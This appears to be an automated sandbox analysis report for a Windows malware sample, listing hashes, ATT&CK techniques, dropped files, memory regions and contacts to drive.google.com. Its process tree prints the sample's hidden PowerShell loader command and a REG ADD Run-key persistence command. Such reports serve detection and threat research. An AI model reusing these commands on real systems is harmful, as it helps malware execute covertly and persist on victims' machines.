d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306

Analysis

max time kernel
142s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
28-06-2024 01:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
Size

655KB
MD5

76583ad77f92f7c21402dcf6e7a4b613
SHA1

8b20685d00b9c729356f8b3d371da03b326e4a80
SHA256

d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306
SHA512

79c4a2621da0707c22a79b472a3a90f34debb6a9e1266ccf6826886646c9a1e495535ff800fccc08ac35531cce4e84f98b5b68afdf25e040bdc3e1720109fced
SSDEEP

12288:zsB4GOFNFqtVK+NvRHTLii5BpGH1uF5BhZeizW0Ij3:I4GOnFqrnj5BpkO5/ZjKj3

Score

8^/10

execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2468 powershell.exe

pid	process
2468	powershell.exe

Loads dropped DLL 4 IoCs

Processes:

d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe

pid	process
4312	d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
4312	d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
4312	d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
4312	d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solosanges = "%Xenoglossia154% -windowstyle minimized $prelocalizations=(Get-ItemProperty -Path 'HKCU:\\Vivans\\').rearrangeret;%Xenoglossia154% ($prelocalizations)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
11 drive.google.com
12 drive.google.com
14 drive.google.com
15 drive.google.com
16 drive.google.com
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

powershell.exe

pid process

2468 powershell.exe
Drops file in Windows directory 1 IoCs

Processes:

d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe

description ioc process

File opened for modification C:\Windows\Fonts\anorakkerne.ini d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

100 reg.exe
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exe

pid process

2468 powershell.exe
2468 powershell.exe
2468 powershell.exe
2468 powershell.exe
2468 powershell.exe
2468 powershell.exe
2468 powershell.exe
2468 powershell.exe
2468 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2468 powershell.exe

flow	ioc
4	drive.google.com
11	drive.google.com
12	drive.google.com
14	drive.google.com
15	drive.google.com
16	drive.google.com

pid	process
2468	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\Fonts\anorakkerne.ini	d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe

pid	process
100	reg.exe

pid	process
2468	powershell.exe
2468	powershell.exe
2468	powershell.exe
2468	powershell.exe
2468	powershell.exe
2468	powershell.exe
2468	powershell.exe
2468	powershell.exe
2468	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2468	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exepowershell.execmd.exe

description	pid	process	target process
PID 4312 wrote to memory of 2468	4312	d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe	powershell.exe
PID 4312 wrote to memory of 2468	4312	d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe	powershell.exe
PID 4312 wrote to memory of 2468	4312	d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe	powershell.exe
PID 2468 wrote to memory of 3960	2468	powershell.exe	cmd.exe
PID 2468 wrote to memory of 3960	2468	powershell.exe	cmd.exe
PID 2468 wrote to memory of 3960	2468	powershell.exe	cmd.exe
PID 3960 wrote to memory of 100	3960	cmd.exe	reg.exe
PID 3960 wrote to memory of 100	3960	cmd.exe	reg.exe
PID 3960 wrote to memory of 100	3960	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
"C:\Users\Admin\AppData\Local\Temp\d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Ammet=Get-Content 'C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Bygningsbestanddels\Kork.Eks';$hesperidate=$Ammet.SubString(3360,3);.$hesperidate($Ammet)"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Solosanges" /t REG_EXPAND_SZ /d "%Xenoglossia154% -windowstyle minimized $prelocalizations=(Get-ItemProperty -Path 'HKCU:\Vivans\').rearrangeret;%Xenoglossia154% ($prelocalizations)"
3⤵
- Suspicious use of WriteProcessMemory
PID:3960

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Solosanges" /t REG_EXPAND_SZ /d "%Xenoglossia154% -windowstyle minimized $prelocalizations=(Get-ItemProperty -Path 'HKCU:\Vivans\').rearrangeret;%Xenoglossia154% ($prelocalizations)"
4⤵
- Adds Run key to start application
- Modifies registry key
PID:100

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xs0olf0y.5o3.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nss3327.tmp\AdvSplash.dll
Filesize
6KB

MD5
6def2cf3daf850acdc1a3e7340a439c4

SHA1
95d0d26f60cd5af697502cd5e53a54913ab188fb

SHA256
3ec3cf21a99ab0533ec2c451df3b5542733f70b972089d5c321ad7ae3b87d175

SHA512
16b1cf4783284d4a1282c569f5c416c713b4b339efcd4d3948bdf7da2194c597bd732d07ba9fabafcab323ba8c8da68845d4435ab9d1916b1810087ee1f5c413

Download Submit
C:\Users\Admin\AppData\Local\Temp\nss3327.tmp\BgImage.dll
Filesize
7KB

MD5
2bb17d45e5ad92053ce1e500408dd8a9

SHA1
f5d3a7ee6e28df532e9ce33976c92ff30a5665e4

SHA256
71ce676703dad028e4083e6b960b1ed89885877079d46d5021506eaa6d99db53

SHA512
efdcb476b9b9b5691fe6b9cd77ecbe48d50c6683da01fd51c6b428cc262528fb3dcd295abe28718321b2307b0e032fcb599588f1eb00a93fd9e6a1f7b322b41f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nss3327.tmp\UserInfo.dll
Filesize
4KB

MD5
8ef0e4eb7c89cdd2b552de746f5e2a53

SHA1
820f681e7cec409a02b194a487d1c8af1038acf0

SHA256
41293b9f6588e0fbdc8fcf2a9bd8e2b244cd5ff038fc13033378da337219c9dc

SHA512
a68533e8a19637d0d44219549b24baba0dc4824424842f125600fda3edcafc4bb6bb340d57a00815f262d82373b440d58d6e4e5b2ceb29bb3f6bc4cbde66c3c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\nss3327.tmp\nsExec.dll
Filesize
6KB

MD5
c129bc26a26be6f5816a03520bb37833

SHA1
18100042155f948301701744b131c516bf26ddb8

SHA256
d3694fa0503158194129d113fcc1c83177ff5a5f93d898ce0bcfe9ce12f06bf4

SHA512
dbe79859c41e00a6e951cee889e7f0de29a712792fb531662285a2d6e384884518c7d5d983894c185b3d31d81213d2477cf4576b0114d352b759fe07a1704e63

Download Submit
C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Bygningsbestanddels\Kork.Eks
Filesize
69KB

MD5
c81a6714a02500d34518c574f9d4b01f

SHA1
e8f5d63579d995c2e80aa96c2fa51b3502739792

SHA256
134b2aeb304ebbbcd2cf8b1eff5b54bd122795ea5eaf70c939ac27fb979459f2

SHA512
90fe3078eb67b5cf39605672f130feeb4e348042ee8792a8e366332d12b3c1c5950655e10b7d6112d8a96b98760fe0a6f5ffb217bb932cbb66494c1a1c6e35c4

Download Submit
C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Bygningsbestanddels\Pitilessness.Lge211
Filesize
337KB

MD5
84cb54267314cdae695bbdbbdd55740a

SHA1
5bf6c405ff05211a5b5455818380449baecac63b

SHA256
40ac4dd2689ff258481e2881bfb93508828a98f3236b09393f7fdbeafd461805

SHA512
49b46e4e08c720207b968b02b301881f8a7140b1afaf3e5adc05119634a69acabb81097a17daed421c96ef14c9ec4919b718d7d768099d6a2bbf47497f67fa4b

Download Submit
C:\Users\Admin\Pictures\slukningen.lnk
Filesize
1004B

MD5
d15ed1e1621e68ceb6487fe5d2f80940

SHA1
79d3116989a3e65a2e030ebff35528c0404f4262

SHA256
e8a5a33a04c80fe9e8b4dacb46e8d4ff70e3cf4c56b0a1e8e3a9229a4ce1c0f9

SHA512
e6651c301f2fd711ea9604160926484b97547fe646084da73689814c0f5a538777710fa8f43d5dd08595f887c5c357fdbc12b53169853ac38e6792e3d4ade90a

Download Submit
memory/2468-168-0x0000000006970000-0x00000000069BC000-memory.dmp

Filesize
304KB

Download
memory/2468-150-0x0000000003320000-0x0000000003356000-memory.dmp

Filesize
216KB

Download
memory/2468-154-0x0000000005A80000-0x0000000005AA2000-memory.dmp

Filesize
136KB

Download
memory/2468-155-0x00000000061F0000-0x0000000006256000-memory.dmp

Filesize
408KB

Download
memory/2468-156-0x00000000062D0000-0x0000000006336000-memory.dmp

Filesize
408KB

Download
memory/2468-157-0x0000000006340000-0x0000000006694000-memory.dmp

Filesize
3.3MB

Download
memory/2468-152-0x0000000074190000-0x0000000074940000-memory.dmp

Filesize
7.7MB

Download
memory/2468-167-0x0000000006940000-0x000000000695E000-memory.dmp

Filesize
120KB

Download
memory/2468-151-0x0000000005BC0000-0x00000000061E8000-memory.dmp

Filesize
6.2MB

Download
memory/2468-170-0x0000000006E60000-0x0000000006E7A000-memory.dmp

Filesize
104KB

Download
memory/2468-169-0x0000000007910000-0x00000000079A6000-memory.dmp

Filesize
600KB

Download
memory/2468-171-0x0000000006EB0000-0x0000000006ED2000-memory.dmp

Filesize
136KB

Download
memory/2468-172-0x0000000007F60000-0x0000000008504000-memory.dmp

Filesize
5.6MB

Download
memory/2468-153-0x0000000074190000-0x0000000074940000-memory.dmp

Filesize
7.7MB

Download
memory/2468-174-0x0000000008B90000-0x000000000920A000-memory.dmp

Filesize
6.5MB

Download
memory/2468-176-0x0000000074190000-0x0000000074940000-memory.dmp

Filesize
7.7MB

Download
memory/2468-177-0x0000000074190000-0x0000000074940000-memory.dmp

Filesize
7.7MB

Download
memory/2468-149-0x000000007419E000-0x000000007419F000-memory.dmp

Filesize
4KB

Download
memory/2468-179-0x0000000074190000-0x0000000074940000-memory.dmp

Filesize
7.7MB

Download
memory/2468-180-0x0000000009210000-0x000000000D01D000-memory.dmp

Filesize
62.1MB

Download
memory/2468-181-0x000000007419E000-0x000000007419F000-memory.dmp

Filesize
4KB

Download
memory/2468-182-0x0000000074190000-0x0000000074940000-memory.dmp

Filesize
7.7MB

Download
memory/2468-184-0x0000000074190000-0x0000000074940000-memory.dmp

Filesize
7.7MB

Download
memory/2468-185-0x0000000026730000-0x0000000027984000-memory.dmp

Filesize
18.3MB

Download
memory/2468-186-0x0000000074190000-0x0000000074940000-memory.dmp

Filesize
7.7MB

Download
memory/2468-189-0x0000000074190000-0x0000000074940000-memory.dmp

Filesize
7.7MB

Download
memory/2468-190-0x0000000074190000-0x0000000074940000-memory.dmp

Filesize
7.7MB

Download